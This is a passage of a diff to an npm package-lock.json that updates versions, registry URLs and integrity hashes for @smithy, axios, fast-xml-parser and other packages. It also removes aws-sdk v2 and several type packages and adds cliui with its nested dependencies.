"https://registry.npmjs.org/@smithy/util-defaults-mode-browser/-/util-defaults-mode-browser-4.3.44.tgz", - "integrity": "sha512-eZg6XzaCbVr2S5cAErU5eGBDaOVTuTo1I65i4tQcHENRcZ8rMWhQy1DaIYUSLyZjsfXvmCqZrstSMYyGFocvHA==", + "version": "4.3.49", + "resolved": "https://registry.npmjs.org/@smithy/util-defaults-mode-browser/-/util-defaults-mode-browser-4.3.49.tgz", + "integrity": "sha512-a5bNrdiONYB/qE2BuKegvUMd/+ZDwdg4vsNuuSzYE8qs2EYAdK9CynL+Rzn29PbPiUqoz/cbpRbcLzD5lEevHw==", "license": "Apache-2.0", "dependencies": { - "@smithy/property-provider": "^4.2.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", + "@smithy/property-provider": "^4.2.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11053,17 +11098,17 @@ } }, "node_modules/@smithy/util-defaults-mode-node": { - "version": "4.2.48", - "resolved": "https://registry.npmjs.org/@smithy/util-defaults-mode-node/-/util-defaults-mode-node-4.2.48.tgz", - "integrity": "sha512-FqOKTlqSaoV3nzO55pMs5NBnZX8EhoI0DGmn9kbYeXWppgHD6dchyuj2HLqp4INJDJbSrj6OFYJkAh/WhSzZPg==", + "version": "4.2.54", + "resolved": "https://registry.npmjs.org/@smithy/util-defaults-mode-node/-/util-defaults-mode-node-4.2.54.tgz", + "integrity": "sha512-g1cvrJvOnzeJgEdf7AE4luI7gp6L8weE0y9a9wQUSGtjb8QRHDbCJYuE4Sy0SD9N8RrnNPFsPltAz/OSoBR9Zw==", "license": "Apache-2.0", "dependencies": { - "@smithy/config-resolver": "^4.4.13", - "@smithy/credential-provider-imds": "^4.2.12", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/property-provider": "^4.2.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", + "@smithy/config-resolver": "^4.4.17", + "@smithy/credential-provider-imds": "^4.2.14", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/property-provider": "^4.2.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11071,13 +11116,13 @@ } }, "node_modules/@smithy/util-endpoints": { - 
"version": "3.3.3", - "resolved": "https://registry.npmjs.org/@smithy/util-endpoints/-/util-endpoints-3.3.3.tgz", - "integrity": "sha512-VACQVe50j0HZPjpwWcjyT51KUQ4AnsvEaQ2lKHOSL4mNLD0G9BjEniQ+yCt1qqfKfiAHRAts26ud7hBjamrwig==", + "version": "3.4.2", + "resolved": "https://registry.npmjs.org/@smithy/util-endpoints/-/util-endpoints-3.4.2.tgz", + "integrity": "sha512-a55Tr+3OKld4TTtnT+RhKOQHyPxm3j/xL4OR83WBUhLJaKDS9dnJ7arRMOp3t31dcLhApwG9bgvrRXBHlLdIkg==", "license": "Apache-2.0", "dependencies": { - "@smithy/node-config-provider": "^4.3.12", - "@smithy/types": "^4.13.1", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11097,12 +11142,12 @@ } }, "node_modules/@smithy/util-middleware": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/util-middleware/-/util-middleware-4.2.12.tgz", - "integrity": "sha512-Er805uFUOvgc0l8nv0e0su0VFISoxhJ/AwOn3gL2NWNY2LUEldP5WtVcRYSQBcjg0y9NfG8JYrCJaYDpupBHJQ==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/util-middleware/-/util-middleware-4.2.14.tgz", + "integrity": "sha512-1Su2vj9RYNDEv/V+2E+jXkkwGsgR7dc4sfHn9Z7ruzQHJIEni9zzw5CauvRXlFJfmgcqYP8fWa0dkh2Q2YaQyw==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11110,13 +11155,13 @@ } }, "node_modules/@smithy/util-retry": { - "version": "4.2.13", - "resolved": "https://registry.npmjs.org/@smithy/util-retry/-/util-retry-4.2.13.tgz", - "integrity": "sha512-qQQsIvL0MGIbUjeSrg0/VlQ3jGNKyM3/2iU3FPNgy01z+Sp4OvcaxbgIoFOTvB61ZoohtutuOvOcgmhbD0katQ==", + "version": "4.3.5", + "resolved": "https://registry.npmjs.org/@smithy/util-retry/-/util-retry-4.3.5.tgz", + "integrity": "sha512-h1IJsbgMDA+jaTjrco/JsyfWOgHRJBv8myB1y4AEI2fjIzD6ktZ7pFAyTw+gwN9GKIAygvC6db0mq0j8N2rFOg==", "license": "Apache-2.0", "dependencies": { - "@smithy/service-error-classification": "^4.2.12", - "@smithy/types": 
"^4.13.1", + "@smithy/service-error-classification": "^4.3.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11124,14 +11169,14 @@ } }, "node_modules/@smithy/util-stream": { - "version": "4.5.21", - "resolved": "https://registry.npmjs.org/@smithy/util-stream/-/util-stream-4.5.21.tgz", - "integrity": "sha512-KzSg+7KKywLnkoKejRtIBXDmwBfjGvg1U1i/etkC7XSWUyFCoLno1IohV2c74IzQqdhX5y3uE44r/8/wuK+A7Q==", + "version": "4.5.25", + "resolved": "https://registry.npmjs.org/@smithy/util-stream/-/util-stream-4.5.25.tgz", + "integrity": "sha512-/PFpG4k8Ze8Ei+mMKj3oiPICYekthuzePZMgZbCqMiXIHHf4n2aZ4Ps0aSRShycFTGuj/J6XldmC0x0DwednIA==", "license": "Apache-2.0", "dependencies": { - "@smithy/fetch-http-handler": "^5.3.15", - "@smithy/node-http-handler": "^4.5.1", - "@smithy/types": "^4.13.1", + "@smithy/fetch-http-handler": "^5.3.17", + "@smithy/node-http-handler": "^4.6.1", + "@smithy/types": "^4.14.1", "@smithy/util-base64": "^4.3.2", "@smithy/util-buffer-from": "^4.2.2", "@smithy/util-hex-encoding": "^4.2.2", @@ -11168,12 +11213,12 @@ } }, "node_modules/@smithy/util-waiter": { - "version": "4.2.14", - "resolved": "https://registry.npmjs.org/@smithy/util-waiter/-/util-waiter-4.2.14.tgz", - "integrity": "sha512-2zqq5o/oizvMaFUlNiTyZ7dbgYv1a893aGut2uaxtbzTx/VYYnRxWzDHuD/ftgcw94ffenua+ZNLrbqwUYE+Bg==", + "version": "4.2.16", + "resolved": "https://registry.npmjs.org/@smithy/util-waiter/-/util-waiter-4.2.16.tgz", + "integrity": "sha512-GtclrKoZ3Lt7jPQ7aTIYKfjY92OgceScftVnkTsG8e1KV8rkvZgN+ny6YSRhd9hxB8rZtwVbmln7NTvE5O3GmQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11267,15 +11312,6 @@ "integrity": "sha512-OvjF+z51L3ov0OyAU0duzsYuvO01PH7x4t6DJx+guahgTnBHkhJdG7soQeTSFLWN3efnHyibZ4Z8l2EuWwJN3A==", "license": "MIT" }, - "node_modules/@tootallnate/once": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/@tootallnate/once/-/once-2.0.0.tgz", - "integrity": 
"sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A==", - "license": "MIT", - "engines": { - "node": ">= 10" - } - }, "node_modules/@tsconfig/node10": { "version": "1.0.9", "resolved": "https://registry.npmjs.org/@tsconfig/node10/-/node10-1.0.9.tgz", @@ -11323,12 +11359,6 @@ "resolved": "https://registry.npmjs.org/@types/btoa-lite/-/btoa-lite-1.0.2.tgz", "integrity": "sha512-ZYbcE2x7yrvNFJiU7xJGrpF/ihpkM7zKgw8bha3LNJSesvTtUNxbpzaT7WXBIryf6jovisrxTBvymxMeLLj1Mg==" }, - "node_modules/@types/caseless": { - "version": "0.12.5", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.5.tgz", - "integrity": "sha512-hWtVTC2q7hc7xZ/RLbxapMvDMgUnDvKvMOpKal4DrMyfGBUfB1oKaZlIRr6mJL+If3bAP6sV/QneGzF6tJjZDg==", - "license": "MIT" - }, "node_modules/@types/chai": { "version": "5.2.3", "resolved": "https://registry.npmjs.org/@types/chai/-/chai-5.2.3.tgz", @@ -11437,19 +11467,6 @@ "integrity": "sha512-DaZNUvLDCAnCTjgwxgiL1eQdxIKEpNLOlTNtAgnZc50bG2copGhRrFN9/PxPBuJe+tZVLCbQ7ls0xveXVRPkvw==", "license": "MIT" }, - "node_modules/@types/jmespath": { - "version": "0.15.2", - "resolved": "https://registry.npmjs.org/@types/jmespath/-/jmespath-0.15.2.tgz", - "integrity": "sha512-pegh49FtNsC389Flyo9y8AfkVIZn9MMPE9yJrO9svhq6Fks2MwymULWjZqySuxmctd3ZH4/n7Mr98D+1Qo5vGA==", - "dev": true - }, - "node_modules/@types/js-yaml": { - "version": "4.0.9", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.9.tgz", - "integrity": "sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==", - "dev": true, - "license": "MIT" - }, "node_modules/@types/json-schema": { "version": "7.0.15", "resolved": "https://registry.npmjs.org/@types/json-schema/-/json-schema-7.0.15.tgz", @@ -11784,35 +11801,6 @@ "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, - 
"node_modules/@types/request": { - "version": "2.48.12", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.12.tgz", - "integrity": "sha512-G3sY+NpsA9jnwm0ixhAFQSJ3Q9JkpLZpJbI3GMv0mIAT0y3mRabYeINzal5WOChIiaTEGQYlHOKgkaM9EisWHw==", - "license": "MIT", - "dependencies": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" - } - }, - "node_modules/@types/request/node_modules/form-data": { - "version": "2.5.5", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.5.tgz", - "integrity": "sha512-jqdObeR2rxZZbPSGL+3VckHMYtu+f9//KXBsVny6JSX/pa38Fy+bGjuG8eW/H6USNQWhLi8Num++cU2yOCNz4A==", - "license": "MIT", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "es-set-tostringtag": "^2.1.0", - "hasown": "^2.0.2", - "mime-types": "^2.1.35", - "safe-buffer": "^5.2.1" - }, - "engines": { - "node": ">= 0.12" - } - }, "node_modules/@types/resolve": { "version": "1.20.6", "resolved": "https://registry.npmjs.org/@types/resolve/-/resolve-1.20.6.tgz", @@ -11905,12 +11893,6 @@ "@types/node": "*" } }, - "node_modules/@types/tough-cookie": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.5.tgz", - "integrity": "sha512-/Ad8+nIOV7Rl++6f1BdKxFSMgmoqEoYbHRpPcx3JEfv8VRsQe9Z4mCXeJBzxs7mbHY/XOZZuXlRNfhpVPbs6ZA==", - "license": "MIT" - }, "node_modules/@types/triple-beam": { "version": "1.3.5", "resolved": "https://registry.npmjs.org/@types/triple-beam/-/triple-beam-1.3.5.tgz", @@ -12196,16 +12178,6 @@ } } }, - "node_modules/@typescript-eslint/typescript-estree/node_modules/brace-expansion": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.3.tgz", - "integrity": "sha512-MCV/fYJEbqx68aE58kv2cA/kiky1G8vux3OR6/jbS+jIMe/6fJWa0DTzJU7dqijOWYwHi1t29FlfYI9uytqlpA==", - "dev": true, - "license": "MIT", - "dependencies": { - "balanced-match": "^1.0.0" - } - }, 
"node_modules/@typescript-eslint/typescript-estree/node_modules/debug": { "version": "4.4.3", "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", @@ -12427,15 +12399,6 @@ "node": ">= 16" } }, - "node_modules/@xmldom/xmldom": { - "version": "0.8.10", - "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.8.10.tgz", - "integrity": "sha512-2WALfTl4xo2SkGCYRt6rDTFfk9R1czmBvUQy12gK2KuRKIpWEhcbbzy8EZXtz/jkRqHX8bFEc6FC1HjX4TUWYw==", - "license": "MIT", - "engines": { - "node": ">=10.0.0" - } - }, "node_modules/abbrev": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/abbrev/-/abbrev-1.1.1.tgz", @@ -13136,102 +13099,10 @@ "fastq": "^1.17.1" } }, - "node_modules/aws-sdk": { - "version": "2.1693.0", - "resolved": "https://registry.npmjs.org/aws-sdk/-/aws-sdk-2.1693.0.tgz", - "integrity": "sha512-cJmb8xEnVLT+R6fBS5sn/EFJiX7tUnDaPtOPZ1vFbOJtd0fnZn/Ky2XGgsvvoeliWeH7mL3TWSX5zXXGSQV6gQ==", - "deprecated": "The AWS SDK for JavaScript (v2) has reached end-of-support, and no longer receives updates. Please migrate your code to use AWS SDK for JavaScript (v3). 
More info https://a.co/cUPnyil", - "hasInstallScript": true, - "license": "Apache-2.0", - "dependencies": { - "buffer": "4.9.2", - "events": "1.1.1", - "ieee754": "1.1.13", - "jmespath": "0.16.0", - "querystring": "0.2.0", - "sax": "1.2.1", - "url": "0.10.3", - "util": "^0.12.4", - "uuid": "8.0.0", - "xml2js": "0.6.2" - }, - "engines": { - "node": ">= 10.0.0" - } - }, - "node_modules/aws-sdk/node_modules/buffer": { - "version": "4.9.2", - "resolved": "https://registry.npmjs.org/buffer/-/buffer-4.9.2.tgz", - "integrity": "sha512-xq+q3SRMOxGivLhBNaUdC64hDTQwejJ+H0T/NB1XMtTVEwNTrfFF3gAxiyW0Bu/xWEGhjVKgUcMhCrUy2+uCWg==", - "license": "MIT", - "dependencies": { - "base64-js": "^1.0.2", - "ieee754": "^1.1.4", - "isarray": "^1.0.0" - } - }, - "node_modules/aws-sdk/node_modules/events": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/events/-/events-1.1.1.tgz", - "integrity": "sha512-kEcvvCBByWXGnZy6JUlgAp2gBIUjfCAV6P6TgT1/aaQKcmuAEC4OZTV1I4EWQLz2gxZw76atuVyvHhTxvi0Flw==", - "license": "MIT", - "engines": { - "node": ">=0.4.x" - } - }, - "node_modules/aws-sdk/node_modules/ieee754": { - "version": "1.1.13", - "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.1.13.tgz", - "integrity": "sha512-4vf7I2LYV/HaWerSo3XmlMkp5eZ83i+/CDluXi/IGTs/O1sejBNhTtnxzmRZfvOUqj7lZjqHkeTvpgSFDlWZTg==", - "license": "BSD-3-Clause" - }, - "node_modules/aws-sdk/node_modules/isarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", - "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==", - "license": "MIT" - }, - "node_modules/aws-sdk/node_modules/sax": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/sax/-/sax-1.2.1.tgz", - "integrity": "sha512-8I2a3LovHTOpm7NV5yOyO8IHqgVsfK4+UuySrXU8YXkSRX7k6hCV9b3HrkKCr3nMpgj+0bmocaJJWpvp1oc7ZA==", - "license": "ISC" - }, - "node_modules/aws-sdk/node_modules/uuid": { - "version": "8.0.0", - "resolved": 
"https://registry.npmjs.org/uuid/-/uuid-8.0.0.tgz", - "integrity": "sha512-jOXGuXZAWdsTH7eZLtyXMqUb9EcWMGZNbL9YcGBJl4MH4nrxHmZJhEHvyLFrkxo+28uLb/NYRcStH48fnD0Vzw==", - "license": "MIT", - "bin": { - "uuid": "dist/bin/uuid" - } - }, - "node_modules/aws-sdk/node_modules/xml2js": { - "version": "0.6.2", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", - "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", - "license": "MIT", - "dependencies": { - "sax": ">=0.6.0", - "xmlbuilder": "~11.0.0" - }, - "engines": { - "node": ">=4.0.0" - } - }, - "node_modules/aws-sdk/node_modules/xmlbuilder": { - "version": "11.0.1", - "resolved": "https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-11.0.1.tgz", - "integrity": "sha512-fDlsI/kFEx7gLvbecc0/ohLG50fugQp8ryHzMTuW9vSa1GJ0XYWKnhsUx7oie3G98+r56aTQIUB4kht42R3JvA==", - "license": "MIT", - "engines": { - "node": ">=4.0" - } - }, "node_modules/axios": { - "version": "1.14.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.14.0.tgz", - "integrity": "sha512-3Y8yrqLSwjuzpXuZ0oIYZ/XGgLwUIBU3uLvbcpb0pidD9ctpShJd43KSlEEkVQg6DS0G9NKyzOvBfUtDKEyHvQ==", + "version": "1.15.0", + "resolved": "https://registry.npmjs.org/axios/-/axios-1.15.0.tgz", + "integrity": "sha512-wWyJDlAatxk30ZJer+GeCWS209sA42X+N5jU2jy6oHTp7ufw8uzUTVFBX9+wTfAlhiJXGS0Bq7X6efruWjuK9Q==", "license": "MIT", "dependencies": { "follow-redirects": "^1.15.11", @@ -13337,7 +13208,8 @@ "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "license": "MIT" }, "node_modules/base64-js": { "version": "1.5.1", @@ -13454,31 +13326,6 @@ "node": ">=8" } }, - "node_modules/bl": { - "version": 
"5.1.0", - "resolved": "https://registry.npmjs.org/bl/-/bl-5.1.0.tgz", - "integrity": "sha512-tv1ZJHLfTDnXE6tMHv73YgSJaWR2AFuPwMntBe7XL/GBFHnT0CLnsHMogfk5+GzCDC5ZWarSCYaIGATZt9dNsQ==", - "dev": true, - "dependencies": { - "buffer": "^6.0.3", - "inherits": "^2.0.4", - "readable-stream": "^3.4.0" - } - }, - "node_modules/bl/node_modules/readable-stream": { - "version": "3.6.2", - "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", - "integrity": "sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==", - "dev": true, - "dependencies": { - "inherits": "^2.0.3", - "string_decoder": "^1.1.1", - "util-deprecate": "^1.0.1" - }, - "engines": { - "node": ">= 6" - } - }, "node_modules/bn.js": { "version": "4.12.3", "resolved": "https://registry.npmjs.org/bn.js/-/bn.js-4.12.3.tgz", @@ -13815,13 +13662,12 @@ "integrity": "sha512-AlcaJBi/pqqJBIQ8U9Mcpc9i8Aqxn88Skv5d+xBX006BY5u8N3mGLHa5Lgppa7L/HfwgwLgZ6NYs+Ag6uUmJRA==" }, "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.3.tgz", + "integrity": "sha512-MCV/fYJEbqx68aE58kv2cA/kiky1G8vux3OR6/jbS+jIMe/6fJWa0DTzJU7dqijOWYwHi1t29FlfYI9uytqlpA==", + "license": "MIT", "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" + "balanced-match": "^1.0.0" } }, "node_modules/braces": { @@ -14043,15 +13889,6 @@ "node": "20 || >=22" } }, - "node_modules/cacache/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - 
"engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/call-bind": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/call-bind/-/call-bind-1.0.8.tgz", @@ -14269,11 +14106,12 @@ } }, "node_modules/chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", + "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", + "license": "BlueOak-1.0.0", "engines": { - "node": ">=10" + "node": ">=18" } }, "node_modules/cipher-base": { @@ -14312,21 +14150,6 @@ "node": ">=6" } }, - "node_modules/cli-cursor": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/cli-cursor/-/cli-cursor-4.0.0.tgz", - "integrity": "sha512-VGtlMu3x/4DOtIUwEkRezxUZ2lBacNJCHash0N0WeZDBS+7Ux1dm3XWAgWYxLJFMMdOeXMHXorshEFhbMSGelg==", - "dev": true, - "dependencies": { - "restore-cursor": "^4.0.0" - }, - "engines": { - "node": "^12.20.0 || ^14.13.1 || >=16.0.0" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/cli-spinners": { "version": "2.9.2", "resolved": "https://registry.npmjs.org/cli-spinners/-/cli-spinners-2.9.2.tgz", @@ -14346,6 +14169,78 @@ "dev": true, "license": "MIT" }, + "node_modules/cliui": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", + "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", + "license": "ISC", + "dependencies": { + "string-width": "^4.2.0", + "strip-ansi": "^6.0.1", + "wrap-ansi": "^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/cliui/node_modules/ansi-regex": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", + 
"integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/cliui/node_modules/emoji-regex": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", + "license": "MIT" + }, + "node_modules/cliui/node_modules/string-width": { + "version": "4.2.3", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", + "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "license": "MIT", + "dependencies": { + "emoji-regex": "^8.0.0", + "is-fullwidth-code-point": "^3.0.0", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cliui/node_modules/strip-ansi": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "license": "MIT", + "dependencies": { + "ansi-regex": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cliui/node_modules/wrap-ansi": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", + "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + } + }, "node_modules/cluster-key-slot": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/cluster-key-slot/-/cluster-key-slot-1.1.2.tgz", @@ -14490,7 +14385,8 @@ "version": "0.0.1", "resolved": 
"https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true + "dev": true, + "license": "MIT" }, "node_modules/conf": { "version": "15.0.2", @@ -16601,9 +16497,9 @@ "integrity": "sha512-eel5UKGn369gGEWOqBShmFJWfq/xSJvsgDzgLYC845GneayWvXBf0lJCBn5qTABfewy1ZDPoaR5OZCP+kssfuw==" }, "node_modules/fast-xml-builder": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.4.tgz", - "integrity": "sha512-f2jhpN4Eccy0/Uz9csxh3Nu6q4ErKxf0XIsasomfOihuSUa3/xw6w8dnOtCDgEItQFJG8KyXPzQXzcODDrrbOg==", + "version": "1.1.5", + "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.5.tgz", + "integrity": "sha512-4TJn/8FKLeslLAH3dnohXqE3QSoxkhvaMzepOIZytwJXZO69Bfz0HBdDHzOTOon6G59Zrk6VQ2bEiv1t61rfkA==", "funding": [ { "type": "github", @@ -16616,9 +16512,9 @@ } }, "node_modules/fast-xml-parser": { - "version": "5.5.9", - "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.5.9.tgz", - "integrity": "sha512-jldvxr1MC6rtiZKgrFnDSvT8xuH+eJqxqOBThUVjYrxssYTo1avZLGql5l0a0BAERR01CadYzZ83kVEkbyDg+g==", + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.7.1.tgz", + "integrity": "sha512-8Cc3f8GUGUULg34pBch/KGyPLglS+OFs05deyOlY7fL2MTagYPKrVQNmR1fLF/yJ9PH5ZSTd3YDF6pnmeZU+zA==", "funding": [ { "type": "github", @@ -16627,9 +16523,10 @@ ], "license": "MIT", "dependencies": { - "fast-xml-builder": "^1.1.4", - "path-expression-matcher": "^1.2.0", - "strnum": "^2.2.2" + "@nodable/entities": "^2.1.0", + "fast-xml-builder": "^1.1.5", + "path-expression-matcher": "^1.5.0", + "strnum": "^2.2.3" }, "bin": { "fxparser": "src/cli/cli.js" @@ -17126,28 +17023,6 @@ "node": ">= 0.6" } }, - "node_modules/fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": 
"sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dependencies": { - "minipass": "^3.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/fs-minipass/node_modules/minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, "node_modules/fs-readdir-recursive": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/fs-readdir-recursive/-/fs-readdir-recursive-1.1.0.tgz", @@ -17339,15 +17214,6 @@ "is-property": "^1.0.2" } }, - "node_modules/generator-function": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/generator-function/-/generator-function-2.0.1.tgz", - "integrity": "sha512-SFdFmIJi+ybC0vjlHN0ZGVGHc3lgE0DxPAT0djjVg+kjOnSqclqmj0KQ7ykTOLP6YxoqOvuAODGdcHJn+43q3g==", - "license": "MIT", - "engines": { - "node": ">= 0.4" - } - }, "node_modules/generic-pool": { "version": "3.9.0", "resolved": "https://registry.npmjs.org/generic-pool/-/generic-pool-3.9.0.tgz", @@ -17505,15 +17371,6 @@ "node": 